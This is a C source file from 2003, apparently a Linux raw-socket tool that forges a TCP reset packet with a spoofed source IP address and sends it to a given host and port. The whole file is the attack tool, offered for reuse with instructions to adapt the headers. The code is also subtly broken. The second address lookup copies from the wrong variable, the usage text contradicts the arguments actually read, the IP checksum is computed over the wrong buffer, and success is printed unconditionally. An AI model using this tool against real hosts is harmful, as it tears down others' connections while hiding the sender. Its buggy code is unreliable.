/****************************************************************
* Copyright (c) 2003                                            *
* author : <aspinall@oltrelinux.com> or <aspi@spine-group.org>  *
* send to host a rst flag with ip spoofed      *
* compile gcc spoof_tcp.c -o spoof_tcp                          *
* Use : #./spoof_tcp 1.1.1.1 212.4.13.231                       *
* License : This source file is under GPL                       *
* Only for Linux kernel                                         *
*                                                               *
*                                                               *
* Special thanks to : #networking@azzurranet                    *
*                     mydecay <mydecay@spine-group.org>         *
*                     sviat <l.pizzira@virgilio.it>             *
* This code is derived from my knowledge of raw sockets,        *
* due to lack of well-done documentation on the web. you        *
* can use it to forge your own tcp packets,all you've got       *
* to do is change header to suit your needs.                    *
*                                                               *
*  Disclaimer:                                                  *
* Use of this information constitutes acceptance for use in     *
* an AS IS condition.There are NO warranties with regard to     *
* this information. In no event shall the author be liable for  *
* any damages whatsoever arising out of or in connection with   *
* the use or spread of this information. Any use of this        *
* information is at the user's own risk.                        *
****************************************************************/


#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <time.h>


void send_rst(void);


/* algoritmo del checksum */

unsigned short in_cksum(unsigned short *addr,int len)
{
int sum = 0;
u_short answer = 0;
u_short *w = addr;
int nleft = len;

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1 ) {
*( u_char* ) ( &answer ) = *( u_char * )w;
sum += answer;
}

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

// main()

main(int argc, char *argv[])
{


struct pseudo_header {
u_long saddr;
u_long daddr;
char useless;
char protocol;
u_short length;
};

char buf[256], buf2[256];

struct hostent *host;
struct hostent *host2;
struct iphdr *ip = (struct iphdr *) buf;
struct tcphdr *tcp = (struct tcphdr *) (buf + sizeof(struct iphdr));
struct pseudo_header *pseudo = (struct pseudo_header *)buf2;

struct sockaddr_in addr;
struct sockaddr_in addr2;
int fd, on=1;



if (geteuid ()) {
fprintf (stderr, "You should be root\n");
exit (1);
 }


if (argc < 3) {
printf("Usage : <spoof_sorg> <host_dest> <port>\n");
exit(1);
 }


if ((host = gethostbyname(argv[1])) != NULL)
memcpy (&addr.sin_addr, host->h_addr, host->h_length);
else if((addr.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
herror("gethostbyname");
exit(1);
}

if ((host2 = gethostbyname(argv[2])) != NULL)
memcpy (&addr2.sin_addr, host->h_addr, host->h_length);
else if((addr2.sin_addr.s_addr = inet_addr(argv[2])) == INADDR_NONE) {
herror("gethostbyname");
exit(1);
}


if((fd = socket(PF_INET,SOCK_RAW,IPPROTO_TCP)) < 0) {
 perror("socket");
 exit(1);
 }


if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on)) < 0) {
 perror("setsockopt");
 exit(1);
 }


/* memoria a 0 */

memset(ip, 0, sizeof(struct iphdr));
memset(tcp, 0, sizeof(struct tcphdr));
memset(pseudo, 0, sizeof(struct pseudo_header));

/* HEADER */

pseudo->saddr = inet_addr(argv[1]);  /* sorgente */
pseudo->daddr = inet_addr(argv[2]);  /* destinazione */
pseudo->useless = 0;  /* inutile :P */
pseudo->protocol = IPPROTO_TCP;  /* tcp */
pseudo->length = htons(sizeof(struct tcphdr)); /* lunghezza header */

   ip->ihl = 5;
   ip->version = 4;
   ip->tos = 0;
   ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
   ip->id = htons((u_short)random());
   ip->frag_off = htons(IP_DF);
   ip->ttl = 255;
   ip->protocol=IPPROTO_TCP;
   ip->saddr = addr.sin_addr.s_addr;
   ip->daddr = addr2.sin_addr.s_addr;
   ip->check = 0;  


   tcp->source = htons(rand()); /* guardare sopra*/
   tcp->dest = htons(atoi(argv[3])); /* guarda sopra */
   tcp->seq = htonl(random()); /* dopo */
   tcp->ack_seq = 0; /* dopo */
   tcp->doff = 5; /* offset */
   tcp->fin = 0;
   tcp->syn = 0;
   tcp->rst = 1;
   tcp->psh = 0;
   tcp->ack = 0;
   tcp->urg = 0;
   tcp->window = htons(4000);
   tcp->urg_ptr = 0;
   tcp->check = 0;
   

/* checksum */

memcpy(buf2, pseudo, sizeof(struct pseudo_header));
memcpy(buf2 + sizeof(struct pseudo_header), tcp, sizeof(struct tcphdr));
memset(buf2 + sizeof(struct pseudo_header) + sizeof(struct tcphdr), 0, 12);
   
   tcp->check = in_cksum((unsigned short *)buf2,(sizeof(struct pseudo_header) + sizeof(struct tcphdr) + 12) &  ~1) ;
   ip->check =  in_cksum((unsigned short *)buf2,(sizeof(struct iphdr) + sizeof(struct tcphdr) + 12) & ~1);

   /* send */
   
   addr.sin_family = AF_INET;
   addr.sin_addr.s_addr = addr2.sin_addr.s_addr;
   addr.sin_port = htons(7);
   
if(sendto(fd,buf, ip->tot_len, 0,(struct sockaddr *)&addr, sizeof(addr)) < 0 )  {
  perror("sendto");
exit(1);
 }

printf("the ip header is %d bytes long.\n", sizeof(struct iphdr));
printf("the tcp header is %d bytes long.\n", sizeof(struct tcphdr));
printf("ip checksum correct\ntcp checksum correct\n");
printf("done\n");

return 0;

   }